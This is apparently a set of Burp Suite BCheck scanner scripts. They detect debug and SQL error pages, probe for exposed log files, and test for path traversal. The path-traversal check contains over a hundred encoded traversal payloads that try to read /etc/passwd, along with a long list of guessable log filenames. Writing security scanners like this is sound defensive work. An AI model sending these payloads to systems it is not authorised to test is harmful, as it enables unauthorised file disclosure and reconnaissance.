 22 |     if {base.response.body} matches "(Application-Trace|Routing Error|DEBUG\"? ?[=:] ?True|Caused by:|stack trace:|Microsoft .NET Framework|Traceback|[0-9]:in `|#!/us|WebApplicationException|java\\.lang\\.|phpinfo|swaggerUi|on line [0-9]|SQLSTATE)" or
 23 |         {base.response.body} matches "mod_[\w]+:" then
 24 |         report issue:
 25 |             severity: low
 26 |             confidence: certain
 27 |             detail: `Debug Page: {issueDetail}`
 28 |             remediation: `{issueRemediation}`
 29 |     end if
 30 | 
 31 |     # Apache Server
 32 |     if {base.response.body} matches "AH[0-9]{5}" or
 33 |         {base.response.body} matches "mod_[\w]+:" then
 34 |         report issue:
 35 |             severity: info
 36 |             confidence: firm
 37 |             detail: `{issueDetail}`
 38 |             remediation: `{issueRemediation}`
 39 |     end if
 40 | 
 41 |     # ASP
 42 |     if {base.response.body} matches "([A-Za-z]{1,32}\.)+[A-Za-z]{0,32}\(([A-Za-z0-9]+\s+[A-Za-z0-9]+[,\s]*)*\)\s+\+{1}\d+" or
 43 |         {base.response.body} matches "Message\":\"Invalid web service call" or
 44 |         {base.response.body} matches "Exception of type" or
 45 |         {base.response.body} matches "Server Error in '" or
 46 |         {base.response.body} matches "Server Error in Application" or
 47 |         {base.response.body} matches "--- End of inner exception stack trace ---" or
 48 |         {base.response.body} matches "Microsoft OLE DB Provider" or
 49 |         {base.response.body} matches "Error ([\d-]+) \([\dA-Fa-f]+\)" or
 50 |         {base.response.body} matches "in [A-Za-z]:\\([A-Za-z0-9_]+\\)+[A-Za-z0-9_\-]+(\.aspx)?\.cs:line [\d]+" or
 51 |         {base.response.body} matches "in [A-Za-z]:\\([A-Za-z0-9_]+\\)+[A-Za-z0-9_\-]+(\.aspx)?\.cs:line [\d]+" or
 52 |         {base.response.body} matches "[A-Za-z\.]+\(([A-Za-z0-9, ]+)?\) \+[0-9]+" or
 53 |         {base.response.body} matches "Syntax error in string in query expression" then
 54 |         report issue:
 55 |             severity: info
 56 |             confidence: firm
 57 |             detail: `ASP Error: {issueDetail}`
 58 |             remediation: `{issueRemediation}`
 59 |     end if
 60 | 
 61 |     # Java
 62 |     if {base.response.body} matches "\.java:[0-9]+" or
 63 |         {base.response.body} matches "\.java\((Inlined )?Compiled Code\)" or
 64 |         {base.response.body} matches "\.invoke\(Unknown Source\)" or
 65 |         {base.response.body} matches "nested exception" or
 66 |         {base.response.body} matches "java\.lang\.([A-Za-z0-9_]*)Exception" or
 67 |         {base.response.body} matches "java.io.FileNotFoundException:" or
 68 |         {base.response.body} matches "Error ([\d-]+) \([\dA-Fa-f]+\)" or
 69 |         {base.response.body} matches "in [A-Za-z]:\\([A-Za-z0-9_]+\\)+[A-Za-z0-9_\-]+(\.aspx)?\.cs:line [\d]+" or
 70 |         {base.response.body} matches "\bORA-[0-9]{5}" or
 71 |         {base.response.body} matches "Oracle.*Driver]" or
 72 |         {base.response.body} matches "quoted string not properly terminated" or
 73 |         {base.response.body} matches "Warning.*\Woci_.*" or
 74 |         {base.response.body} matches "Warning.*\Wora_.*" or
 75 |         {base.response.body} matches "Warning: oci_parse()" or
 76 |         {base.response.body} matches "JBWEB[0-9]{6}:" or
 77 |         {base.response.body} matches "Syntax error in string in query expression" then
 78 |         report issue:
 79 |             severity: info
 80 |             confidence: firm
 81 |             detail: `Java Error: {issueDetail}`
 82 |             remediation: `{issueRemediation}`
 83 |     end if
 84 | 
 85 |     # Generic
 86 |     if {base.response.body} matches "NameError:" or
 87 |         {base.response.body} matches "ImportError:" or
 88 |         {base.response.body} matches "IndentationError:" or
 89 |         {base.response.body} matches "Traceback \(most recent call last\):" or
 90 |         {base.response.body} matches "File \"[A-Za-z0-9\-_\./]*\", line [0-9]+" or
 91 |         {base.response.body} matches "Fatal error:" or
 92 |         {base.response.body} matches "\.php on line [0-9]+" or
 93 |         {base.response.body} matches "\.php</b> on line <b>[0-9]+" or
 94 |         {base.response.body} matches "at (\/[A-Za-z0-9\.]+)*\.pm line [0-9]+" or
 95 |         {base.response.body} matches "\.groovy:[0-9]+" or
 96 |         {base.response.body} matches "\.rb:[0-9]+:in" or
 97 |         {base.response.body} matches "\.scala:[0-9]+" or
 98 |         {base.response.body} matches "client intended to address" or
 99 |         {base.response.body} matches "could not build optimal proxy_headers_hash" or
100 |         {base.response.body} matches "at (\/[A-Za-z0-9\.]+)*\.pm line [0-9]+" or
101 |         {base.response.body} matches "UnhandledPromiseRejectionWarning:" or
102 |         {base.response.body} matches "TypeError:" or
103 |         {base.response.body} matches "runtime error:.*invalid" or
104 |         {base.response.body} matches "ReferenceError:" then
105 |         report issue:
106 |             severity: info
107 |             confidence: firm
108 |             detail: `Generic Error: {issueDetail}`
109 |             remediation: `{issueRemediation}`
110 |     end if
111 | 
112 |     # SQL error
113 |     if {base.response.body} matches "You have an error in your SQL syntax" or
114 |         {base.response.body} matches "Error: Unknown column" or
115 |         {base.response.body} matches "MySqlClient\." or
116 |         {base.response.body} matches "com\.mysql\.jdbc\.exceptions" or
117 |         {base.response.body} matches "Illegal mix of collations \([\w\s\,]+\) and \([\w\s\,]+\) for operation" or
118 |         {base.response.body} matches "valid MySQL result" or
119 |         {base.response.body} matches "warning mysql_" or
120 |         {base.response.body} matches "CLI Driver.*DB2" or
121 |         {base.response.body} matches "db2_\w+\(" or
122 |         {base.response.body} matches "DB2 SQL error" or
123 |         {base.response.body} matches "\bdb2_\w+\(" or
124 |         {base.response.body} matches "\[(ODBC SQL Server Driver|SQL Server|ODBC Driver Manager)\]" or
125 |         {base.response.body} matches "Unclosed quotation mark" or
126 |         {base.response.body} matches "warning.*mssql_.*" or
127 |         {base.response.body} matches "Driver.* SQL[-_]*Server" or
128 |         {base.response.body} matches "(\W|\A)SQL Server.*Driver" or
129 |         {base.response.body} matches "Conversion failed when converting the" or
130 |         {base.response.body} matches "Cannot initialize the data source object of OLE DB provider" or
131 |         {base.response.body} matches "QUERY\s+\[thread1\] SyntaxError:" or
132 |         {base.response.body} matches "uncaught exception:" or
133 |         {base.response.body} matches "PostgreSQL.*ERROR" or
134 |         {base.response.body} matches "Warning.*\Wpg_.*" or
135 |         {base.response.body} matches "Wvalid PostgreSQL result" or
136 |         {base.response.body} matches "Npgsql\." or
137 |         {base.response.body} matches "org\.postgresql\.util\.PSQLException" or
138 |         {base.response.body} matches "SQLite/JDBCDriver" or
139 |         {base.response.body} matches "SQLite.Exception" or
140 |         {base.response.body} matches "System.Data.SQLite.SQLiteException" or
141 |         {base.response.body} matches "Warning.*sqlite_.*" or
142 |         {base.response.body} matches "Warning.*SQLite3::" or
143 |         {base.response.body} matches "Warning.*sqlite_.*" or
144 |         {base.response.body} matches "\[SQLITE_ERROR\]" or
145 |         {base.response.body} matches "org\.hsqldb\.jdbc" or
146 |         {base.response.body} matches "Dynamic SQL Error" or
147 |         {base.response.body} matches "\[function.ibase.query\]" or
148 |         {base.response.body} matches "Warning.*maxdb.*" or
149 |         {base.response.body} matches "Warning.*ingre_" or
150 |         {base.response.body} matches "Warning.*ibase_.*" or
151 |         {base.response.body} matches "(?i)Warning.*sybase.*" or
152 |         {base.response.body} matches "SQL error.*POS([0-9]+).*" or
153 |         {base.response.body} matches "Ingres SQLSTATE" or
154 |         {base.response.body} matches "Ingres\W.*Driver" or
155 |         {base.response.body} matches "DB Error:" then
156 |         report issue:
157 |             severity: low
158 |             confidence: firm
159 |             detail: `SQL Error: {issueDetail}`
160 |             remediation: `{issueRemediation}`
161 |     end if
162 | 


--------------------------------------------------------------------------------
/vulnerability-classes/path-traversal-on-path.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Path Traversal on Path"
  4 |     description: "Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application"
  5 |     author: "j3ssie"
  6 |     tags: "lfi", "path-traversal", "injection"
  7 | 
  8 | define:
  9 |     issueDetail = `Path Traversal on Path {latest.request.url}`
 10 |     references = `
 11 |     ## References:
 12 |     - https://portswigger.net/web-security/file-path-traversal
 13 |     - https://book.hacktricks.xyz/pentesting-web/file-inclusion
 14 |     - https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html`
 15 |     issueRemediation = `Avoid passing user-supplied input to filesystem APIs altogether
 16 |      {references}`
 17 | 
 18 | run for each:
 19 |     injections =
 20 |         `../..//etc/passwd`,
 21 |         `../../..//etc/passwd`,
 22 |         `../../../..//etc/passwd`,
 23 |         `../../../../..//etc/passwd`,
 24 |         `../../../../../..//etc/passwd`,
 25 |         `../../../../../../../..//etc/passwd`,
 26 |         `..%2f/etc/passwd`,
 27 |         `..%2f..%2f/etc/passwd`,
 28 |         `..%2f..%2f..%2f/etc/passwd`,
 29 |         `..%2f..%2f..%2f..%2f/etc/passwd`,
 30 |         `..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 31 |         `..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 32 |         `..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 33 |         `..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd`,
 34 |         `%2e%2e//etc/passwd`,
 35 |         `%2e%2e/%2e%2e//etc/passwd`,
 36 |         `%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 37 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 38 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 39 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 40 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 41 |         `%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd`,
 42 |         `%2e%2e%2f/etc/passwd`,
 43 |         `%2e%2e%2f%2e%2e%2f/etc/passwd`,
 44 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 45 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 46 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 47 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 48 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 49 |         `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd`,
 50 |         `..%252f/etc/passwd`,
 51 |         `..%252f..%252f/etc/passwd`,
 52 |         `..%252f..%252f..%252f/etc/passwd`,
 53 |         `..%252f..%252f..%252f..%252f/etc/passwd`,
 54 |         `..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 55 |         `..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 56 |         `..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 57 |         `..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd`,
 58 |         `%252e%252e//etc/passwd`,
 59 |         `%252e%252e/%252e%252e//etc/passwd`,
 60 |         `%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 61 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 62 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 63 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 64 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 65 |         `%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd`,
 66 |         `%252e%252e%252f/etc/passwd`,
 67 |         `%252e%252e%252f%252e%252e%252f/etc/passwd`,
 68 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 69 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 70 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 71 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 72 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 73 |         `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd`,
 74 |         `..\/etc/passwd`,
 75 |         `..\..\/etc/passwd`,
 76 |         `..\..\..\/etc/passwd`,
 77 |         `..\..\..\..\/etc/passwd`,
 78 |         `..\..\..\..\..\/etc/passwd`,
 79 |         `..\..\..\..\..\..\/etc/passwd`,
 80 |         `..\..\..\..\..\..\..\/etc/passwd`,
 81 |         `..\..\..\..\..\..\..\..\/etc/passwd`,
 82 |         `..%255c/etc/passwd`,
 83 |         `..%255c..%255c/etc/passwd`,
 84 |         `..%255c..%255c..%255c/etc/passwd`,
 85 |         `..%255c..%255c..%255c..%255c/etc/passwd`,
 86 |         `..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 87 |         `..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 88 |         `..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 89 |         `..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd`,
 90 |         `%252e%252e\/etc/passwd`,
 91 |         `%252e%252e\%252e%252e\/etc/passwd..%5c/etc/passwd`,
 92 |         `..%5c..%5c/etc/passwd`,
 93 |         `..%5c..%5c..%5c/etc/passwd`,
 94 |         `..%5c..%5c..%5c..%5c/etc/passwd`,
 95 |         `..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 96 |         `..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 97 |         `..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 98 |         `..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd`,
 99 |         `%2e%2e\/etc/passwd`,
100 |         `%2e%2e\%2e%2e\/etc/passwd`,
101 |         `%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
102 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
103 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
104 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
105 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
106 |         `%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd`,
107 |         `%2e%2e%5c/etc/passwd`,
108 |         `%2e%2e%5c%2e%2e%5c/etc/passwd`,
109 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
110 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
111 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
112 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
113 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
114 |         `%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd`,
115 |         `%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
116 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
117 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
118 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
119 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
120 |         `%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd`,
121 |         `%252e%252e%255c/etc/passwd`,
122 |         `%252e%252e%255c%252e%252e%255c/etc/passwd`,
123 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
124 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
125 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
126 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
127 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`,
128 |         `%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd`
129 | 
130 | given path then
131 |     send request called check:
132 |         method: "GET"
133 |         path: {injections}
134 | 
135 |     if {check.response.status_code} is "200" then
136 |         if ("root:" in {check.response.body} and
137 |             "bin/" in {check.response.body}) or
138 |             ("for 16-bit app support" in {check.response.body} or
139 |             "boot loader" in {check.response.body}) then
140 |             report issue:
141 |                 severity: high
142 |                 confidence: firm
143 |                 detail: `{issueDetail}`
144 |         end if
145 |     end if
146 | 
147 |     # replace the potential path with the last path
148 |     # like if the path is `/v1/settings/public`. it will be convert to  `/v1/settings/{potential_path}`
149 |     if not({base.request.url.path} is "/") then
150 |         send request called check1:
151 |             method: "GET"
152 |             replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{injections}`
153 | 
154 |         if {check1.response.status_code} is "200" then
155 |             if ("root:" in {check1.response.body} and
156 |                 "bin/" in {check1.response.body}) or
157 |                 ("for 16-bit app support" in {check1.response.body} or
158 |                 "boot loader" in {check1.response.body}) then
159 |                 report issue:
160 |                     severity: high
161 |                     confidence: firm
162 |                     detail: `{issueDetail}`
163 |             end if
164 |         end if
165 |     end if
166 | 


--------------------------------------------------------------------------------
/sensitive/sensitive-log-file-exposed.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Sensitive Log File Exposed"
  4 |     description: "Tests for exposed Log file config in current path and at the root directory of site"
  5 |     author: "j3ssie"
  6 |     tags: "exposure", "sensitive", "config", "log-file"
  7 | 
  8 | define:
  9 |     garbage_path = `/hopefullyget404.log`
 10 |     issueName = `Sensitive Log File`
 11 | 
 12 | run for each:
 13 |     # you could add more values to this list to make the check repeat
 14 |     sensitive_path =
 15 |         "0.log",
 16 |         "00000000000000000000.log",
 17 |         "001.log",
 18 |         "00check.log",
 19 |         "Access.log",
 20 |         "Accuracy.log",
 21 |         "CMakeError.log",
 22 |         "CMakeOutput.log",
 23 |         "Change.log",
 24 |         "Check.log",
 25 |         "DEEP.log",
 26 |         "Default-build.log",
 27 |         "Default-build.log.log",
 28 |         "Default-exec.log",
 29 |         "Default-exec.log.log",
 30 |         "EdgeCase.log",
 31 |         "Error.log",
 32 |         "Form1.log",
 33 |         "JJPHP_Log.log",
 34 |         "LastBuild.log",
 35 |         "LastTest.log",
 36 |         "LastTestsFailed.log",
 37 |         "Nexus_5.log",
 38 |         "NuGet.log",
 39 |         "OGLdpf.log",
 40 |         "ObjDetect.log",
 41 |         "Ogre.log",
 42 |         "PARAM.log",
 43 |         "PayPal.log",
 44 |         "Project.log",
 45 |         "R.log",
 46 |         "Train.log",
 47 |         "VMProblem.log",
 48 |         "VSND.log",
 49 |         "WarningsAndErrors.log",
 50 |         "XNN.log",
 51 |         "Xorg.0.log",
 52 |         "__console.log",
 53 |         "__mysql_errors.log",
 54 |         "a.log",
 55 |         "abc.log",
 56 |         "acces.log",
 57 |         "access.log",
 58 |         "address.wast.log",
 59 |         "adhearsion.log",
 60 |         "af_moderncv_resume.log",
 61 |         "all.log",
 62 |         "allegro.log",
 63 |         "ansible.log",
 64 |         "ap_DevDebugProjectContainerCompiler.log",
 65 |         "apache.log",
 66 |         "apacheAccess.log",
 67 |         "apacheError.log",
 68 |         "api.log",
 69 |         "app.log",
 70 |         "appDevDebugProjectContainerCompiler.log",
 71 |         "application.log",
 72 |         "audit.log",
 73 |         "auth.log",
 74 |         "automake.log",
 75 |         "autoscan-2.69.log",
 76 |         "autoscan.log",
 77 |         "b.log",
 78 |         "backup.log",
 79 |         "basic.log",
 80 |         "bbfs.log",
 81 |         "beamer.log",
 82 |         "bem.log",
 83 |         "bench.log",
 84 |         "benchmark.log",
 85 |         "benchmarks.log",
 86 |         "bgpd.log",
 87 |         "bogus.log",
 88 |         "bootstrap.log",
 89 |         "bot.log",
 90 |         "browser-exceptions.log",
 91 |         "buiderror.log",
 92 |         "build.log",
 93 |         "buildRunner.log",
 94 |         "buildRunner2.log",
 95 |         "builderror.log",
 96 |         "c.log",
 97 |         "cache.log",
 98 |         "cadena.log",
 99 |         "cerr.log",
100 |         "change.log",
101 |         "changelog.log",
102 |         "changes.log",
103 |         "chat.log",
104 |         "check.log",
105 |         "chromedriver.log",
106 |         "client.log",
107 |         "colors.log",
108 |         "commands.log",
109 |         "comments.log",
110 |         "common-error.log",
111 |         "common.log",
112 |         "comp130essay.log",
113 |         "compare.log",
114 |         "compile.log",
115 |         "config.log",
116 |         "configure-wrapper.log",
117 |         "configure.log",
118 |         "conn.log",
119 |         "connect.log",
120 |         "connection.log",
121 |         "console.log",
122 |         "convert.log",
123 |         "coregen.log",
124 |         "coverage-error.log",
125 |         "cp.log",
126 |         "cp1.log",
127 |         "cp2.log",
128 |         "crash.log",
129 |         "cron.log",
130 |         "csp.log",
131 |         "ct2ctml.log",
132 |         "cups.log",
133 |         "custom.log",
134 |         "daemon.log",
135 |         "data.log",
136 |         "database.log",
137 |         "datanucleus.log",
138 |         "db-1.log",
139 |         "db.log",
140 |         "debhelper.log",
141 |         "debug.log",
142 |         "debug_ssl.log",
143 |         "default-centos-64.log",
144 |         "default.log",
145 |         "demo.log",
146 |         "demo2.log",
147 |         "dep.log",
148 |         "deploy.log",
149 |         "deployment.log",
150 |         "derby.log",
151 |         "dest1.log",
152 |         "detail.log",
153 |         "dev.log",
154 |         "developement.log",
155 |         "development.log",
156 |         "dfsmetrics.log",
157 |         "django.log",
158 |         "dmesg.log",
159 |         "dnsmasq.log",
160 |         "dnsspoof.log",
161 |         "doc.log",
162 |         "doit.log",
163 |         "dovecot.index.log",
164 |         "doxygen.log",
165 |         "drone.log",
166 |         "drv.log",
167 |         "dummy.log",
168 |         "e.log",
169 |         "edb.log",
170 |         "edb00001.log",
171 |         "edb00002.log",
172 |         "edbtmp.log",
173 |         "egg-agent.log",
174 |         "egg-web.log",
175 |         "elaboration.log",
176 |         "empty.log",
177 |         "engine_yard.log",
178 |         "envoy.log",
179 |         "err.log",
180 |         "error.log",
181 |         "errors.log",
182 |         "event.log",
183 |         "events.log",
184 |         "everything.log",
185 |         "example.log",
186 |         "exception.log",
187 |         "exceptions.log",
188 |         "execution.log",
189 |         "exit.log",
190 |         "expected.log",
191 |         "fail.log",
192 |         "fake-gps-data.log",
193 |         "fake.access.log",
194 |         "fan.log",
195 |         "figwheel_server.log",
196 |         "file.log",
197 |         "files.log",
198 |         "firebase-debug.log",
199 |         "fit.log",
200 |         "flights.log",
201 |         "fml-client-1.log",
202 |         "foo.log",
203 |         "framerps.log",
204 |         "fuse.log",
205 |         "game.log",
206 |         "games.log",
207 |         "gc.log",
208 |         "gc1.log",
209 |         "gc2.log",
210 |         "gc3.log",
211 |         "geckodriver.log",
212 |         "ghostdriver.log",
213 |         "git.log",
214 |         "git_for_ro_code.log",
215 |         "global-build.log",
216 |         "goldenrun.log",
217 |         "gps.log",
218 |         "gradle.log",
219 |         "gunicorn_supervisor.log",
220 |         "gurobi.log",
221 |         "hadoop_build.log",
222 |         "hello.log",
223 |         "history.log",
224 |         "http.log",
225 |         "httpd.log",
226 |         "imDatabase.log",
227 |         "imMaxSession.log",
228 |         "imServer.log",
229 |         "images.log",
230 |         "import.log",
231 |         "imports.wast.log",
232 |         "index.log",
233 |         "info.log",
234 |         "input.log",
235 |         "install.log",
236 |         "intro.log",
237 |         "invalid_chars.log",
238 |         "inxi.log",
239 |         "isim.log",
240 |         "isimcrash.log",
241 |         "isimkernel.log",
242 |         "jepsen.log",
243 |         "jmeter.log",
244 |         "jmimemagic.log",
245 |         "joChess.log",
246 |         "journal.log",
247 |         "json.log",
248 |         "juggernaut.log",
249 |         "jvmmetrics.log",
250 |         "kern.clean.log",
251 |         "kernel.log",
252 |         "kitchen.log",
253 |         "ksync.log",
254 |         "lab4.build.log",
255 |         "laravel.log",
256 |         "lastrun.log",
257 |         "latest.log",
258 |         "latestrun.log",
259 |         "latin1.log",
260 |         "launch4j.log",
261 |         "libpeerconnection.log",
262 |         "license.log",
263 |         "link_err.log",
264 |         "list.log",
265 |         "localhost_wp_.log",
266 |         "log.log",
267 |         "log1.log",
268 |         "log2.log",
269 |         "log3.log",
270 |         "log4j.log",
271 |         "logfile.log",
272 |         "logger.log",
273 |         "loging.log",
274 |         "logs.log",
275 |         "long_file.log",
276 |         "lpclink.log",
277 |         "lpclink2.log",
278 |         "lscpu.log",
279 |         "luadoc.log",
280 |         "mail.log",
281 |         "main.log",
282 |         "make.log",
283 |         "manager.2013-11-23.log",
284 |         "manual.log",
285 |         "map.log",
286 |         "master.log",
287 |         "matcalc-dev.debhelper.log",
288 |         "matcalc0.debhelper.log",
289 |         "mccExcludedFiles.log",
290 |         "merb_test.log",
291 |         "merb_test_log.log",
292 |         "message.log",
293 |         "messages.log",
294 |         "microblog.log",
295 |         "migration.log",
296 |         "missfont.log",
297 |         "mix.log",
298 |         "mkmf.log",
299 |         "mm.log",
300 |         "mock_multiple_responses_spec.log",
301 |         "mock_one_response_spec.log",
302 |         "mod.log",
303 |         "moduleparser_command.log",
304 |         "moke.log",
305 |         "mongo.log",
306 |         "mongodb.log",
307 |         "monitor.log",
308 |         "mpd.log",
309 |         "mrmetrics.log",
310 |         "mxunit-test.log",
311 |         "my.log",
312 |         "myapp.log",
313 |         "mylog.log",
314 |         "mysql.log",
315 |         "mysql_build.log",
316 |         "nagios.log",
317 |         "named.conf.log",
318 |         "named.log",
319 |         "nasm.build.log",
320 |         "nasm_sw1.build.log",
321 |         "nestest.log",
322 |         "neverdie.log",
323 |         "newrelic_agent.log",
324 |         "nginx.error.log",
325 |         "nginx.log",
326 |         "node_1.log",
327 |         "non-object-res.log",
328 |         "notes.log",
329 |         "notice.log",
330 |         "npm-debug.log",
331 |         "ntp.log",
332 |         "nweb.log",
333 |         "offsetlogs.cracking-ignore.log",
334 |         "one.log",
335 |         "origin.log",
336 |         "other_vhosts_access.log",
337 |         "out.log",
338 |         "out0.log",
339 |         "out1.log",
340 |         "output.log",
341 |         "packet_filter.log",
342 |         "paper.log",
343 |         "particicle.log",
344 |         "passenger.3000.log",
345 |         "pbc.log",
346 |         "pdebuild-internal-lenny.log",
347 |         "pdebuild-internal-sid.log",
348 |         "pdebuild-normal-lenny.log",
349 |         "pdebuild-normal-sid.log",
350 |         "pdebuild-normal-squeeze.log",
351 |         "perf.log",
352 |         "performance.log",
353 |         "phantomjsdriver.log",
354 |         "php.log",
355 |         "php_error.log",
356 |         "php_errors.log",
357 |         "ping.log",
358 |         "pip.log",
359 |         "planAhead.log",
360 |         "planAhead.ngc2edif.log",
361 |         "planAhead_run.log",
362 |         "plcemu.log",
363 |         "poc.log",
364 |         "portstats.log",
365 |         "power.log",
366 |         "proc_diskstats.log",
367 |         "proc_ps.log",
368 |         "proc_stat.log",
369 |         "process.log",
370 |         "prod.log",
371 |         "production.log",
372 |         "production_rails_2_3.log",
373 |         "production_rails_3_0.log",
374 |         "production_rails_4_1.log",
375 |         "production_rails_oink_2_2.log",
376 |         "profile.log",
377 |         "progress.log",
378 |         "project.log",
379 |         "property.log",
380 |         "proxy.log",
381 |         "proxy_log.log",
382 |         "q.log",
383 |         "q2.log",
384 |         "query.log",
385 |         "quickstart.log",
386 |         "rails_1x.log",
387 |         "rails_22.log",
388 |         "rails_22_cached.log",
389 |         "rails_unordered.log",
390 |         "rake.log",
391 |         "rapport.log",
392 |         "raw.log",
393 |         "rc.log",
394 |         "readme.log",
395 |         "redis.log",
396 |         "ref.log",
397 |         "refman.log",
398 |         "release.log",
399 |         "report.log",
400 |         "reporter.log",
401 |         "reports.log",
402 |         "request.log",
403 |         "request_info.log",
404 |         "requests.log",
405 |         "response.log",
406 |         "result.log",
407 |         "results.log",
408 |         "resume.log",
409 |         "ro.log",
410 |         "ro_gem.log",
411 |         "roswell.debhelper.log",
412 |         "rpcmetrics.log",
413 |         "rtm.pre.log",
414 |         "ruby_19.log",
415 |         "run.log",
416 |         "runme.log",
417 |         "sImple_tracker.log",
418 |         "saa.log",
419 |         "sample.log",
420 |         "sample1.log",
421 |         "sample2.log",
422 |         "sampledata.log",
423 |         "sauce_connect.log",
